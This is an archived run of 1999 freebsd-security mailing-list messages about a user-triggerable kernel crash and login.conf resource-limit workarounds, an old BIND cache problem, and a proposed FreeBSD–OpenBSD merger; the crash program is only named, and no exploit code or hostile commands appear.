:What I am surprised at is that even with
:MAXUSERS set to 128, I have to use something as restrictive as
:
:dialu:\
:	:copyright=/etc/COPYRIGHT:\
:	:welcome=/etc/motd:\
:	:setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\
:	:path=~/bin /bin /usr/bin /usr/local/bin /usr/X11R6/bin:\
:	:nologin=/var/run/nologin:\
:	:cputime=unlimited:\
:	:datasize=unlimited:\
:	:stacksize=unlimited:\
:	:memorylocked-cur=10M:\
:	:memoryuse-max=30M:\
:	:maxproc-cur=9:\
:	:maxproc-max=15:\
:	:openfiles-max=16:\
:	:filesize=unlimited:\
:	:coredumpsize=unlimited:\
:	:priority=0:\
:	:ignoretime@:\
:	:umask=022:
:
:
:It seems anything above 16 files open (e.g. 32), and they are able to panic
:the system.

    There have been proposals to extend the concept of per-user resources
    (for example, maxproc is a per-user resource). This way you would be
    able to set reasonable overall limits for the user that do not overly
    restrict the per-process limits. However, nobody has attempted to
    actually code the idea. It seems to me a fairly easy thing to do
    through the use of the credential's cache (but I'm not volunteering).

					-Matt

From owner-freebsd-security Tue Aug 17 12:06:56 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id B5EAB1576C for ; Tue, 17 Aug 1999 12:06:45 -0700 (PDT) (envelope-from barrett@phoenix.aye.net)
Received: (qmail 395 invoked by uid 1000); 17 Aug 1999 18:59:55 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 17 Aug 1999 18:59:55 -0000
Date: Tue, 17 Aug 1999 14:59:55 -0400 (EDT)
From: Barrett Richardson
To: Mike Tancsa
Cc: freebsd-security@freebsd.org
Subject: Re: Any work around for this FreeBSD bug/DoS ?
In-Reply-To: <4.1.19990816203409.05989960@granite.sentex.ca>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 16 Aug 1999, Mike Tancsa wrote:

>
> Is there any work around or coming fix for the 'testsockbuf.c' originally
> reported by Marc Olzheim on Aug 9th ? It's only a matter
> of time until some wannabe script kiddie uploads it to one of my servers
> for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I
> sent a message to the security officer last week but haven't heard anything
> since then.
>
> ---Mike
>

I've been using a mechanism that prevents the running of arbitrary
executables on my systems. I require a flag bit to be set for an
executable to be run -- so if a script kiddie uploads or creates a binary
executable it won't run, unless I approve it by setting the flag. At the
moment I let shell scripts slide which will leave you vulnerable to perl
-- but that could be easily changed. When I set the flag for somebody, I
also set the immutable flag so a user can't overwrite it with a binary of
his choosing. I've relaxed the restriction for root to avoid
administrative headaches.

I've been mulling over the idea of making the behavior controllable via a
sysctl mib on my systems, or adding it to one of the securelevels. Would
be nicer if the securelevels were more fine grained like with a mask to
turn on/off various things. What would be nice would be a bit to turn it
on/off for users, a bit to turn it off/on for root and a bit to turn it
off/on for shell scripts.

The model with using the flag bit is imperfect, but can help out when
you're in a pinch.
- Barrett

From owner-freebsd-security Tue Aug 17 16:41:03 1999
From: butlermd@tgn.net (Michael Butler)
Date: Tue, 17 Aug 1999 18:36:22 -0500
Organization: Texas GulfNet
To: list@inet-access.net, freebsd-isp@freebsd.org, freebsd-security@freebsd.org
Subject: Re: tzo dynamic DNS

Hokay, boys and girls, turn your channel if you don't like the long mushy
ones ;->

It's time to summarize because I'm satisfied. There are different opinions
for different reasons and that is to be expected. It was human nature for
me to react to the unknown, perceived as threat. My original post was
simple if somewhat knee-jerk.

>On Wed, 11 Aug 1999 12:58:51 -0500, I wrote:
>This may be old stuff but is anyone getting dns mods from tzo.com
>hijacking ip addresses to their domains?
>
>What do we do about it?
>
>see www.tzo.com
>
>They're about to be cut off at the FW
>TIA

Turns out the danger was there, not because TZO presented one though. I
had simply sat on an ancient BIND wayyyy too long.
Thanks to "Mitch Vincent" who hit the nail on the head.

--Date: Thu, 12 Aug 1999 08:40:28 -0400
--Older versions of BIND allow for cache modification remotely, that
--might be what you're running into, you better upgrade, there are
--other serious security holes in those versions too.
---Mitch

Mitch looked at it like me as a potential problem but Mitch, in a mature
manner, eschewed emotional or selfish conversation. Some folks acted like I
am an idiot (at least a debatable concept, heh) by being concerned about a
legitimate entity that provides a legitimate service within the Internet
framework, read "TZO was resourceful" as well as harmless.

I then focused back on the symptoms with a later post.

>Anybody had problems with Sendmail anti spam, fwd/reverse DNS
>mismatches? I *think* that was what we saw.

Mitch however, had this covered in the BIND problem. We've brought BIND,
sendmail, Apache, and some other stuff into the present as a result of
this thread, thanks to all.

OTOH, there were folks like myself who regarded this as manipulation of my
DNS and IP space. I still feel funny that someone could *modify* my
configuration at least in the eyes of other DNS servers on the 'Net. Not
having total control is also human nature, I'll get over it.

---------------

Since 1994 I've enjoyed Michael Dillon's posts right here at inet-access
among other places. This belongs (if not already stated) in Boardwatch for
ISP exposure.

Please note that if you ban servers then you are banning anything that
works like a telephone set. A telephone hogs the line 24 hours a day but
uses no bandwidth unless a call is in progress. But because it *IS* hogging
that line, the telephone is able to ring and announce an incoming call.
With convergence of the Internet and telephony services, any ISP who has
not structured their business to deal with always-on services will be at a
disadvantage.
So don't ban servers because that is a sleazy way of sidestepping the
issue and users will hate you for it. Let them run all the servers they
want as long as they understand that they will pay excess charges for being
online too long or using too much bandwidth. Rig your systems so that users
can opt for being cut off by the system rather than incurring excess
charges.

Basically, keep your customers happy, give them what they want, and charge
a fee that covers your costs and makes you a profit.

Views like this, backing up into the shotgun formation so you can see the
field and responding quickly, is what keeps independent ISPs in business
whilst the big boys hammer away with their inherent strength *and*
weaknesses.

--

Finally, what sealed it for me was a message from Eric McIntyre:

From: "Ericm"
Date: Tue, 17 Aug 1999 14:44:38 -0400

>If you are unhappy that your users are using our service, you should place
>something about dynamic dns in your terms of service agreement.

Agreed, I had to learn more about you.

>The
>newsgroups are not the place to complain about us, you should complain to
>your users that are abusing your service. If you offer either static IP
>addresses at low prices, or offered dynamic dns options to them, they
>wouldn't need our services.

OK, this ain't a newsgroup is it? We're all mature ISPs, right? I had a
problem to solve. I had to do like the dogs and "bow-up" until we sniffed
each other's butts. As I said defense from the unknown is the human
response. Several responses thought I was lame in my thoughts that you were
a threat. Others saw it like I did... another hurdle to overcome.

I have thought in the past about the third level, like customer.tgn.net

I'm still looking at your stuff. From what I understand of this now it
looks like your methods may work for me too. I'll continue to read your
information to see how you operate. I may be a customer or affiliate of
yours too.
>We have no control over the content or the terms of service agreements that
>the users sign. They choose our services because they typically have a need
>that their ISP will not help them with.

I didn't escalate or feed the AUP fight. I had old BIND; that seems to be
the core of my problem. I am pretty liberal with my hours. I posted a mushy
response to Michael Dillon that talks a little about this.

>thanks

Thanks to you, I may be in touch after I get a chance to resurface for air.

========================================
========================================

Philosophical summary:

...back up from the shotgun formation, into the stands where you see it's
just a game, you paid to get in, and we're just here for a good time

I hope our team ISPs and other independents win. When it's all over (Y2k,
heh) we all go home and get on with life.

Overall, I was pleased to see this thread turn into the epitome of what the
old Internet was about. I was concerned, asked a question to the vast
unpaid research department, and got many answers.

Distilling that info I came about my decision. Mine was different from
other readers for different reasons. Different folks come and go reading
the same words and go away with different ideas. I pray that never changes.

I got on "da 'Net" rather late in 1994 but appreciate and admire the way
the 'Net was and *how* it was built and by whom. These days, though, we
seem to be paranoid from all angles. Black hat hackers are more numerous,
we now have to watch for commercial threats (big boys and less than moral
or ethical opportunists), legal potholes (and black holes) all around the
"Information Superhighway", and finally the government is redefining
history... again. (lest anarchy get a good name I guess)

For the latter though, I realize in this case changing history <"doublespeak"
-- Orwell> was just campaign loose-lip.
I found this cute:

Al Gore's claim to creating the Internet is still creating some zingers
from Republicans. The latest is from Dan Quayle making light of his potato
misspelling - "If Al Gore created the Internet, then I invented the
spell-check."
-- http://www.swickey.com/archive/3-16-99.html

peace
____________________________________________________________
Michael Butler, Texas GulfNet,     | www.tgn.net
908 South Brooks, PO Box 2089      |
Brazoria, TX 77422-2089            | Voice 409-798-NETT
Part of the Pointecom International| FAX 409-798-6398
Network and the Global Internet    |

From owner-freebsd-security Tue Aug 17 17:16:01 1999
From: Mike Tancsa
Date: Tue, 17 Aug 1999 20:28:47 -0400
To: Matthew Dillon
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?

At 01:36 PM 8/17/99 , Matthew Dillon wrote:
>    There have been proposals to extend the concept of per-user resources
>    (for example, maxproc is a per-user resource).
>    This way you would be
>    able to set reasonable overall limits for the user that do not overly
>    restrict the per-process limits.  However, nobody has attempted to
>    actually code the idea.  It seems to me a fairly easy thing to do through
>    the use of the credential's cache (but I'm not volunteering).
>
>                                       -Matt

Do any of the existing UNIX variants out there have this level of
granularity?

        ---Mike

**********************************************************************
Mike Tancsa, Network Admin       *  mike@sentex.net
Sentex Communications Corp,      *  http://www.sentex.net/mike
Cambridge, Ontario               *  01.519.651.3400
Canada                           *

From owner-freebsd-security Tue Aug 17 17:24:19 1999
From: Brett Glass
Date: Tue, 17 Aug 1999 18:23:25 -0600
To: Matthew Dillon, Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?

At 10:27 PM 8/16/99 -0700, Matthew Dillon wrote:
>    There are many ways a user can crash the system... eating network mbufs
>    isn't the easiest.
>    My experience is that as long as you cover most of
>    the bases, the few that remain will not cause enough of a problem to
>    become endemic.  Crashing a machine through a user account is not
>    really satisfactory to most hackers since it is so easy to do -- and
>    also relatively easy to trace.

Perhaps. But this is no excuse for leaving such a serious hole open! No
unprivileged user should be able to crash the system under any
circumstances. Especially not this easily.

--Brett

From owner-freebsd-security Tue Aug 17 17:27:08 1999
From: Brett Glass
Date: Tue, 17 Aug 1999 18:25:23 -0600
To: Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?

Does it crash OpenBSD? Theo'd want to know.

--Brett

At 08:40 PM 8/16/99 -0400, Mike Tancsa wrote:
>Is there any work around or coming fix for the 'testsockbuf.c' originally
>reported by Marc Olzheim on Aug 9th ? It's only a matter
>of time until some wannabe script kiddie uploads it to one of my servers
>for his/her cgi-script.
>It crashes 2.2.x and 3.x servers reliably :-( I
>sent a message to the security officer last week but haven't heard anything
>since then.
>
>       ---Mike

From owner-freebsd-security Tue Aug 17 17:32:26 1999
From: Matthew Dillon
Date: Tue, 17 Aug 1999 17:31:18 -0700 (PDT)
To: Brett Glass
Cc: Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?

:
:Perhaps. But this is no excuse for leaving such a serious hole open! No
:unprivileged user should be able to crash the system under any circumstances.
:Especially not this easily.
:
:--Brett

    I agree, but being a freeware project someone has to decide to fix it.
    I've got my hands full with VM (and not having commit privs already makes
    that difficult enough).
                                        -Matt
                                        Matthew Dillon

From owner-freebsd-security Tue Aug 17 17:36:46 1999
From: Mike Tancsa
Date: Tue, 17 Aug 1999 20:35:59 -0400
To: brett@lariat.org, mike@sentex.net, freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?

No idea. Anyone know about NetBSD? If it's purely a resource starvation
issue I am curious as to why it does not crash LINUX. However that is just
a report I have not verified myself.

        ---Mike

-----Original Message-----
Subject: Re: Any work around for this FreeBSD bug/DoS ?
From: Brett Glass
Date: Tue, 17 Aug 1999 20:25:23 -0400
To: Mike Tancsa; freebsd-security@FreeBSD.ORG

Does it crash OpenBSD? Theo'd want to know.

--Brett

At 08:40 PM 8/16/99 -0400, Mike Tancsa wrote:
>Is there any work around or coming fix for the 'testsockbuf.c' originally
>reported by Marc Olzheim on Aug 9th ? It's only a matter
>of time until some wannabe script kiddie uploads it to one of my servers
>for his/her cgi-script.
>It crashes 2.2.x and 3.x servers reliably :-( I
>sent a message to the security officer last week but haven't heard anything
>since then.
>
>       ---Mike

From owner-freebsd-security Tue Aug 17 18:21:01 1999
From: Mike Tancsa
Date: Tue, 17 Aug 1999 21:30:56 -0400
To: Barrett Richardson
Cc: freebsd-security@freebsd.org
Subject: Re: Any work around for this FreeBSD bug/DoS ?

>I've been using a mechanism that prevents the running of arbitrary
>executables on my systems. I require a flag bit to be set for an
>executable to be run -- so if a script kiddie uploads or creates
>a binary executable it won't run, unless I approve it by setting the
>flag. At the moment I let shell scripts slide, which will leave you
>vulnerable to perl -- but that could be easily changed.

Interesting concept, but I guess it would get only the dumbest script
kiddies. Also, more and more exploits seem to be released in perl to make
them 'cross platform compatible'.
        ---Mike

**********************************************************************
Mike Tancsa, Network Admin       *  mike@sentex.net
Sentex Communications Corp,      *  http://www.sentex.net/mike
Cambridge, Ontario               *  01.519.651.3400
Canada                           *

From owner-freebsd-security Tue Aug 17 18:33:20 1999
From: mike@sentex.net (Mike Tancsa)
Date: Wed, 18 Aug 1999 01:44:40 GMT
To: geniusj@phoenix.unacom.com (The Tech-Admin Dude)
Cc: security@freebsd.org
Subject: Re: misc/13202: Easy for user to crash system

On 17 Aug 1999 13:35:17 -0400, in sentex.lists.freebsd.bugs you wrote:

>The following reply was made to PR misc/13202; it has been noted by GNATS.
>
>From: The Tech-Admin Dude
>To: slawson@alphamicro.com
>Cc: freebsd-gnats-submit@freebsd.org
>Subject: Re: misc/13202: Easy for user to crash system
>Date: Tue, 17 Aug 1999 21:17:15 -0400 (EDT)
>
> I recommend using login accounting, that is what it is there for :)..
> /etc/login.conf.. How much swap was there? What was MAXUSERS set to?
> normally, for an ls, if you have maxusers at default, i'm surprised you
> didn't run out of processes before it crashed, must have low swap? Anyway,
> main point, USE LOGIN ACCOUNTING :)

Is there a rough rule of thumb as to how much overhead login accounting
takes on a system?
Mike Tancsa (mdtancsa@sentex.net)
Sentex Communications Corp, Waterloo, Ontario, Canada
"Who is this 'BSD', and why should we free him?"

From owner-freebsd-security Tue Aug 17 19:52:47 1999
From: "James Gill"
Date: Fri, 13 Aug 1999 00:53:37 -0400
Subject: OpenBSD

As a result of this conversation, I found myself once again cruising the
OpenBSD website and noticed a particularly disturbing paragraph at the
bottom of the front page at http://www.openbsd.org/goals.html:

"Theo de Raadt has spent more than $30,000 (CDN) to make OpenBSD run so
far, mostly due to expensive networking costs in Canada and such (due to
USA crypto policies, it is not possible to move the project to the USA).
No funding or cost-sharing of the project comes from any company or
educational institution. As well, Theo works full-time on improving
OpenBSD. Additional funding is urgently needed at all times, in fact a nice
sponsorship or two would go a long ways towards ensuring that OpenBSD
continues to exist. Currently the project is in grave danger.
Please do not take this above statement too lightly, since the project is
typically not in strong financial health."

I dunno, perhaps this is an opportune time to try to coordinate the
projects?

--gill

From owner-freebsd-security Tue Aug 17 21:56:01 1999
From: Garance A Drosihn
Date: Wed, 18 Aug 1999 00:56:20 -0400
To: "James Gill"
Subject: Re: OpenBSD

At 12:53 AM -0400 8/13/99, James Gill wrote:
>I dunno, perhaps this is an opportune time to try to coordinate the
>projects?

It is always a good time to coordinate them. The trick is in actually
doing the coordination... :-)

I assume you're suggesting that the freebsd project pay the openbsd
project some amount such that the openbsd project (outside the USA) could
maintain some security-related pieces meant for FreeBSD, and thus avoid
the US export-control issues? I don't know how well that would work. If
it's workable, it might be advantageous for both projects.
---
Garance Alistair Drosehn           =   gad@eclipse.acs.rpi.edu
Senior Systems Programmer          or  drosih@rpi.edu
Rensselaer Polytechnic Institute

From owner-freebsd-security Tue Aug 17 22:21:45 1999
From: Brett Glass
Date: Tue, 17 Aug 1999 23:20:50 -0600
To: Mike Tancsa, Matthew Dillon
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?

At 08:28 PM 8/17/99 -0400, Mike Tancsa wrote:
>Do any of the existing UNIX variants out there have this level of granularity?

It's possible to set an automatically calculated limit based on other
parameters, and to reserve some emergency space for the kernel and vital
processes (the "banker's algorithm"). So, one doesn't HAVE to add infinite
granularity to guard against resource starvation.
--Brett

From owner-freebsd-security Tue Aug 17 22:21:46 1999
From: Brett Glass
Date: Tue, 17 Aug 1999 23:18:00 -0600
To: Matthew Dillon
Cc: Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?

Well, who's a kernel memory allocation expert? I would dive on this one,
but I'd be coming in cold; I've never messed with that part of the kernel
at all. All I know about mbuf allocation is what's in McKusick.

--Brett

At 05:31 PM 8/17/99 -0700, Matthew Dillon wrote:
>:
>:Perhaps. But this is no excuse for leaving such a serious hole open! No
>:unprivileged user should be able to crash the system under any circumstances.
>:Especially not this easily.
>:
>:--Brett
>
>    I agree, but being a freeware project someone has to decide to fix it.
>    I've got my hands full with VM (and not having commit privs already makes
>    that difficult enough).
>
>                                       -Matt
>                                       Matthew Dillon
>

From owner-freebsd-security Tue Aug 17 22:27:48 1999
From: "Thomas Uhrfelt"
Date: Wed, 18 Aug 1999 07:25:46 +0200
To: "James Gill"
Subject: RE: OpenBSD

> Please do not take this above statement too lightly, since the project
> is typically not in strong financial health. "
>
>
> I dunno, perhaps this is an opportune time to try to coordinate the
> projects?
>
> --gill

I for one would love to see the talented programmers/designers of OpenBSD
merge their excellent features into FreeBSD and join our happy family.
Regards,
Thomas Uhrfelt

From owner-freebsd-security Tue Aug 17 22:46:02 1999
From: Brett Glass
Date: Tue, 17 Aug 1999 23:44:29 -0600
To: "Thomas Uhrfelt", "James Gill"
Subject: RE: OpenBSD

At 07:25 AM 8/18/99 +0200, Thomas Uhrfelt wrote:
>I for one would love to see the talented programmers/designers of OpenBSD
>merge their excellent features into FreeBSD and join our happy family.

One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained
on quite a few CPUs and machine architectures. Would FreeBSD be willing to
go that route?
--Brett

From owner-freebsd-security Tue Aug 17 23:00:21 1999
From: Mike Nowlin
Date: Wed, 18 Aug 1999 01:58:02 -0400 (EDT)
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: RE: OpenBSD

> One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained
> on quite a few CPUs and machine architectures. Would FreeBSD be willing to
> go that route?

I'd sure hope so... Let's face it -- even though FreeBSD is (in my opinion)
the most "robust" out of the bunch, the x86 architecture isn't going to win
any awards for performance.... Cheap, yes. Easy, yes. Works for the most
part, yes. But it's still based off of the idea that we need to be
backwards-compatible with the late 1700's.

The Alpha port of FBSD is A Good Thing (I'm hoping to try it out this
weekend on a couple of the Alpha machines I have available for playing
with), but the high-end boxes are pretty pricey. You can find
multi-processor SPARC machines being practically given away by companies
who don't know what they're capable of, not to mention several other
platforms.

If the code bits are merged together properly (key word), maintaining a
multiple-architecture source tree shouldn't be that difficult -- just make
sure the machine-dependent parts all end up with the same ways of doing
things...
After all -- if Microsloth can do it with NT...... :)

--mike

From owner-freebsd-security Tue Aug 17 23:06:18 1999
Received: from nexus.plymovent.se (nexus.plymovent.se [212.247.77.253]) by hub.freebsd.org (Postfix) with ESMTP id 09AF814A0B for ; Tue, 17 Aug 1999 23:06:15 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se)
Received: from tu ([192.168.1.21]) by nexus.plymovent.se (8.9.3/8.9.3) with SMTP id IAA03706; Wed, 18 Aug 1999 08:13:23 +0200 (CEST) (envelope-from thomas.uhrfelt@plymovent.se)
From: "Thomas Uhrfelt"
To: "Brett Glass"
Cc:
Subject: RE: OpenBSD
Date: Wed, 18 Aug 1999 08:04:40 +0200
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <4.2.0.58.19990817234258.0479b3b0@localhost>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal

> One snag, though: OpenBSD, like NetBSD, is cross-platform and is
> maintained
> on quite a few CPUs and machine architectures. Would FreeBSD be willing to
> go that route?

I can see this is going to be tricky. But I am sure it all would work out
for the best if we try.
Regards,
Thomas Uhrfelt

From owner-freebsd-security Tue Aug 17 23:12:01 1999
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id A2E8115713 for ; Tue, 17 Aug 1999 23:11:58 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id IAA29325; Wed, 18 Aug 1999 08:09:42 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Brett Glass
Cc: "Thomas Uhrfelt" , "James Gill" , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-reply-to: Your message of "Tue, 17 Aug 1999 23:44:29 MDT." <4.2.0.58.19990817234258.0479b3b0@localhost>
Date: Wed, 18 Aug 1999 08:09:41 +0200
Message-ID: <29323.934956581@critter.freebsd.dk>
From: Poul-Henning Kamp

In message <4.2.0.58.19990817234258.0479b3b0@localhost>, Brett Glass writes:
>One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained
>on quite a few CPUs and machine architectures. Would FreeBSD be willing to
>go that route?

Yes, if sufficient hackers come with the code.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!
From owner-freebsd-security Wed Aug 18 00:30:23 1999
Received: from nexus.plymovent.se (nexus.plymovent.se [212.247.77.253]) by hub.freebsd.org (Postfix) with ESMTP id DA1E814D50 for ; Wed, 18 Aug 1999 00:30:16 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se)
Received: from tu ([192.168.1.21]) by nexus.plymovent.se (8.9.3/8.9.3) with SMTP id JAA04318; Wed, 18 Aug 1999 09:37:08 +0200 (CEST) (envelope-from thomas.uhrfelt@plymovent.se)
From: "Thomas Uhrfelt"
To: "Poul-Henning Kamp"
Cc:
Subject: RE: OpenBSD
Date: Wed, 18 Aug 1999 09:28:23 +0200
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <29323.934956581@critter.freebsd.dk>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal

> >One snag, though: OpenBSD, like NetBSD, is cross-platform and is
> maintained
> >on quite a few CPUs and machine architectures. Would FreeBSD be
> willing to
> >go that route?
>
> Yes, if sufficient hackers come with the code.

An additional benefit from a major merger like this would be a huge display
of strength from the BSD camp through this unification. FreeBSD itself faces
a platform issue when the Merced is going into full production, and I can
see some benefits from having people used to developing for multiple
platforms in the FreeBSD project when we are faced with this task.

I am not a programmer, nor am I a brilliant sysadmin like many in here. I am
just a happy user of FreeBSD and will continue to be so for many years to
come. So my opinions should be taken very lightly when it comes to a big and
serious issue like this.
Regards,
Thomas Uhrfelt

From owner-freebsd-security Wed Aug 18 01:21:11 1999
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 2CA72156B3 for ; Wed, 18 Aug 1999 01:21:10 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id BAA78059; Wed, 18 Aug 1999 01:21:07 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: "James Gill"
Cc: freebsd-security@freebsd.org
Subject: Re: OpenBSD
In-reply-to: Your message of "Fri, 13 Aug 1999 00:53:37 EDT."
Date: Wed, 18 Aug 1999 01:21:07 -0700
Message-ID: <78055.934964467@localhost>
From: "Jordan K. Hubbard"

> I dunno, perhaps this is an opportune time to try to coordinate the
> projects?

It's never been a question of money, coordination, or really anything at
all to do with engineering. It has everything to do with one or more
individuals volunteering the time necessary for making something like this
happen.

That also goes for just about every other obvious idea or clear shortcoming
that one might note for FreeBSD - if it's obvious or clear, chances are
excellent that it's been both suggested many times and failed many times
due to lack of this one key missing ingredient.
:)

- Jordan

From owner-freebsd-security Wed Aug 18 06:29:35 1999
Received: from trooper.velocet.ca (host-034.canadiantire.ca [209.146.201.34]) by hub.freebsd.org (Postfix) with ESMTP id 1E635157E5 for ; Wed, 18 Aug 1999 06:29:29 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca)
Received: (from dgilbert@localhost) by trooper.velocet.ca (8.9.3/8.9.3) id JAA11366; Wed, 18 Aug 1999 09:27:13 -0400 (EDT) (envelope-from dgilbert)
From: David Gilbert
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14266.46257.592595.362846@trooper.velocet.ca>
Date: Wed, 18 Aug 1999 09:27:13 -0400 (EDT)
To: Garance A Drosihn
Cc: "James Gill" ,
Subject: Re: OpenBSD
In-Reply-To:
References:
X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid

>>>>> "Garance" == Garance A Drosihn writes:

Garance> At 12:53 AM -0400 8/13/99, James Gill wrote:
>> I dunno, perhaps this is an opportune time to try to coordinate the
>> projects?

Garance> It is always a good time to coordinate them. The trick is in
Garance> actually doing the coordination... :-)

Garance> I assume you're suggesting that the freebsd project pay the
Garance> openbsd project some amount such that the openbsd project
Garance> (outside the USA) could maintain some security-related pieces
Garance> meant for FreeBSD, and thus avoid the US export-control
Garance> issues? I don't know how well that would work. If it's
Garance> workable, it might be advantageous for both projects.

The other option, of course, is to establish a home for FreeBSD (or at
least FreeBSD security) that is outside the non-free US :) somewhere.

Dave.

--
============================================================================
|David Gilbert, Velocet Communications.       | Two things can only be     |
|Mail:       dgilbert@velocet.net             | equal if and only if they  |
|http://www.velocet.net/~dgilbert             | are precisely opposite.    |
=========================================================GLO================

From owner-freebsd-security Wed Aug 18 08:11:09 1999
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 2DE4414EDD for ; Wed, 18 Aug 1999 08:11:04 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA08398; Wed, 18 Aug 1999 09:10:58 -0600 (MDT)
Message-Id: <4.2.0.58.19990818090642.04808ec0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Wed, 18 Aug 1999 09:07:55 -0600
To: Poul-Henning Kamp
From: Brett Glass
Subject: Re: OpenBSD
Cc: "Thomas Uhrfelt" , "James Gill" , freebsd-security@FreeBSD.ORG
In-Reply-To: <29323.934956581@critter.freebsd.dk>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

At 08:09 AM 8/18/99 +0200, Poul-Henning Kamp wrote:
>In message <4.2.0.58.19990817234258.0479b3b0@localhost>, Brett Glass writes:
>
> >One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained
> >on quite a few CPUs and machine architectures. Would FreeBSD be willing to
> >go that route?
>
>Yes, if sufficient hackers come with the code.

Well, they've already come with the code. Twice, yet: we have NetBSD *and*
OpenBSD.

Hey, now THERE would be an event that would get the BSDs some positive
press: a Great Unification.
--Brett

From owner-freebsd-security Wed Aug 18 08:11:07 1999
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id CFDF114E16 for ; Wed, 18 Aug 1999 08:11:04 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA08404; Wed, 18 Aug 1999 09:11:11 -0600 (MDT)
Message-Id: <4.2.0.58.19990818090832.04805220@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Wed, 18 Aug 1999 09:10:49 -0600
To: "Jordan K. Hubbard" , "James Gill"
From: Brett Glass
Subject: Re: OpenBSD
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <78055.934964467@localhost>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

At 01:21 AM 8/18/99 -0700, Jordan K. Hubbard wrote:
>It's never been a question of money, coordination, or really anything
>at all to do with engineering. It has everything to do with one or
>more individuals volunteering the time necessary for making something
>like this happen.
>
>That also goes for just about every other obvious idea or clear
>shortcoming that one might note for FreeBSD - if it's obvious or
>clear, chances are excellent that it's been both suggested many times
>and failed many times due to lack of this one key missing ingredient.

:)

With a larger (merged) talent pool, it'd be more likely to succeed. The
biggest trick, of course, would be dealing with personalities, not code.

I'll say this much, though: the OpenBSD approach to crypto export
restrictions (i.e. keeping the code in Canada) is brilliant and could help
FreeBSD.
--Brett Glass

From owner-freebsd-security Wed Aug 18 08:39:03 1999
Received: from tandem.milestonerdl.com (tandem.milestonerdl.com [204.107.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 9BA4515925 for ; Wed, 18 Aug 1999 08:38:49 -0700 (PDT) (envelope-from marc@tandem.milestonerdl.com)
Received: from localhost (marc@localhost) by tandem.milestonerdl.com (8.9.3/8.9.3) with ESMTP id MAA10546; Wed, 18 Aug 1999 12:09:33 -0500 (CDT)
Date: Wed, 18 Aug 1999 12:09:33 -0500 (CDT)
From: marc rassbach
To: Brett Glass
Cc: "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
